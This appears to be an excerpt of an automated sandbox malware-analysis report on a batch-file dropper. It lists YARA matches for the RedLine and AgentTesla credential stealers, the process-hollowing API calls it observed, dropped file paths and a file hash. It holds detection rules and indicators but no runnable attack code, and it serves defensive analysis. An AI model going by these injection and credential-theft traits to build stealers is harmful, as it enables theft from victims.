Source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000009.00000002.1859312320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000011.00000002.2918780561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0000000B.00000002.2004085524.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000011.00000001.1996288631.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen

Found large BAT file

Source: z1Transaction_ID_REF2418_cmd.bat

Static file information: 1139107

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D8670 NtUnmapViewOfSection,	3_2_031D8670
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D8400 NtReadVirtualMemory,	3_2_031D8400
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D7A2C NtAllocateVirtualMemory,	3_2_031D7A2C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D7D78 NtWriteVirtualMemory,	3_2_031D7D78
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	3_2_031D8D70
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031DDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	3_2_031DDD70
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031DDC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	3_2_031DDC04
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031DDC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	3_2_031DDC8C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031DDBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	3_2_031DDBB0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D7A2A NtAllocateVirtualMemory,	3_2_031D7A2A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031D8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	3_2_031D8D6E
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031B8670 NtUnmapViewOfSection,	10_2_031B8670
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031B8400 NtReadVirtualMemory,	10_2_031B8400
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031B7A2C NtAllocateVirtualMemory,	10_2_031B7A2C
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031B7D78 NtWriteVirtualMemory,	10_2_031B7D78
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031B8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	10_2_031B8D70
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031BDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	10_2_031BDD70
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031B86F7 NtUnmapViewOfSection,	10_2_031B86F7
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031BDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	10_2_031BDBB0
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031B7A2A NtAllocateVirtualMemory,	10_2_031B7A2A
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031B7AC9 NtAllocateVirtualMemory,	10_2_031B7AC9
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031B8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	10_2_031B8D6E
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031BDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	10_2_031BDC04
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031BDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	10_2_031BDC8C
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031A8670 NtUnmapViewOfSection,	16_2_031A8670
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031A8400 NtReadVirtualMemory,	16_2_031A8400
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031A7A2C NtAllocateVirtualMemory,	16_2_031A7A2C
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031A7D78 NtWriteVirtualMemory,	16_2_031A7D78
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031A8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	16_2_031A8D70
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031ADD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	16_2_031ADD70
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031A86F7 NtUnmapViewOfSection,	16_2_031A86F7
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031ADBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	16_2_031ADBB0
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031A7A2A NtAllocateVirtualMemory,	16_2_031A7A2A
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031A7AC9 NtAllocateVirtualMemory,	16_2_031A7AC9
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031A8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	16_2_031A8D6E
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031ADC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	16_2_031ADC04
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031ADC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	16_2_031ADC8C

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_031D8788 CreateProcessAsUserW,

3_2_031D8788

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031C20C4	3_2_031C20C4
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00408C60	9_2_00408C60
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_0040DC11	9_2_0040DC11
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00407C3F	9_2_00407C3F
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00418CCC	9_2_00418CCC
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00406CA0	9_2_00406CA0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_004028B0	9_2_004028B0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_0041A4BE	9_2_0041A4BE
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00408C60	9_2_00408C60
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00418244	9_2_00418244
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00401650	9_2_00401650
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00402F20	9_2_00402F20
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_004193C4	9_2_004193C4
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00418788	9_2_00418788
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00402F89	9_2_00402F89
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00402B90	9_2_00402B90
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_004073A0	9_2_004073A0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_27F6DA50	9_2_27F6DA50
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_27F6CE38	9_2_27F6CE38
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_27F60FD0	9_2_27F60FD0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_27F6D180	9_2_27F6D180
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_27F61030	9_2_27F61030
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D186748	9_2_2D186748
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D18CFC8	9_2_2D18CFC8
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D1899C0	9_2_2D1899C0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D180040	9_2_2D180040
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D18F278	9_2_2D18F278
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D18F9D2	9_2_2D18F9D2
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D180007	9_2_2D180007
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D18C0E8	9_2_2D18C0E8
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D8157B7	9_2_2D8157B7
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D8109D0	9_2_2D8109D0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D81A8A2	9_2_2D81A8A2
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D81DE38	9_2_2D81DE38
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2D811AC8	9_2_2D811AC8
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2DB81C60	9_2_2DB81C60
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2DB8E720	9_2_2DB8E720
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2DB81C57	9_2_2DB81C57
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_2DEC4571	9_2_2DEC4571
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00408C60	9_1_00408C60
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_0040DC11	9_1_0040DC11
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00407C3F	9_1_00407C3F
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00418CCC	9_1_00418CCC
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00406CA0	9_1_00406CA0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_004028B0	9_1_004028B0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_0041A4BE	9_1_0041A4BE
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00408C60	9_1_00408C60
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00418244	9_1_00418244
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00401650	9_1_00401650
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00402F20	9_1_00402F20
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_004193C4	9_1_004193C4
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00418788	9_1_00418788
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00402F89	9_1_00402F89
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00402B90	9_1_00402B90
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_004073A0	9_1_004073A0
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031A20C4	10_2_031A20C4
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031AC98E	10_2_031AC98E
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 10_2_031AC9DE	10_2_031AC9DE
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00408C60	11_2_00408C60
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_0040DC11	11_2_0040DC11
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00407C3F	11_2_00407C3F
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00418CCC	11_2_00418CCC
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00406CA0	11_2_00406CA0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_004028B0	11_2_004028B0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_0041A4BE	11_2_0041A4BE
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00408C60	11_2_00408C60
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00418244	11_2_00418244
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00401650	11_2_00401650
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00402F20	11_2_00402F20
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_004193C4	11_2_004193C4
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00418788	11_2_00418788
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00402F89	11_2_00402F89
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00402B90	11_2_00402B90
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_004073A0	11_2_004073A0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_24F1DCE8	11_2_24F1DCE8
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_24F1D0D0	11_2_24F1D0D0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_24F11030	11_2_24F11030
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_24F1D418	11_2_24F1D418
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_24F10FD0	11_2_24F10FD0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2A490040	11_2_2A490040
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2A4999A0	11_2_2A4999A0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2A496728	11_2_2A496728
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2A49CFA8	11_2_2A49CFA8
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2A49002F	11_2_2A49002F
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2AB1A8CF	11_2_2AB1A8CF
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2AB107C0	11_2_2AB107C0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2AB155A7	11_2_2AB155A7
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2AB118B8	11_2_2AB118B8
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2AB1DD88	11_2_2AB1DD88
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2AFE0C30	11_2_2AFE0C30
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_2AFEE860	11_2_2AFEE860
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00408C60	11_1_00408C60
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_0040DC11	11_1_0040DC11
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00407C3F	11_1_00407C3F
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00418CCC	11_1_00418CCC
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00406CA0	11_1_00406CA0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_004028B0	11_1_004028B0
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_0041A4BE	11_1_0041A4BE
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00408C60	11_1_00408C60
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00418244	11_1_00418244
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00401650	11_1_00401650
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00402F20	11_1_00402F20
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_004193C4	11_1_004193C4
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00418788	11_1_00418788
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00402F89	11_1_00402F89
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00402B90	11_1_00402B90
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_004073A0	11_1_004073A0
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe	Code function: 13_2_004057B8	13_2_004057B8
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_031920C4	16_2_031920C4
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_0319C98F	16_2_0319C98F
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: 16_2_0319C9DF	16_2_0319C9DF

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Libraries\xrbjyllC.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe	Code function: String function: 0040A6C4 appears 68 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 031C46D4 appears 244 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 031D89D0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 031D894C appears 56 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 031C4500 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 031C4860 appears 949 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 031C44DC appears 74 times
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: String function: 031A894C appears 50 times
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: String function: 031946D4 appears 155 times
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: String function: 03194860 appears 683 times
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: String function: 031A46D4 appears 155 times
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: String function: 031A4860 appears 683 times
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: String function: 031B894C appears 50 times
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: String function: 0040D606 appears 96 times
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: String function: 0040E1D8 appears 172 times
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: String function: 0040FB9C appears 40 times

Yara signature match

Source: 9.1.xrbjyllC.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.1.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
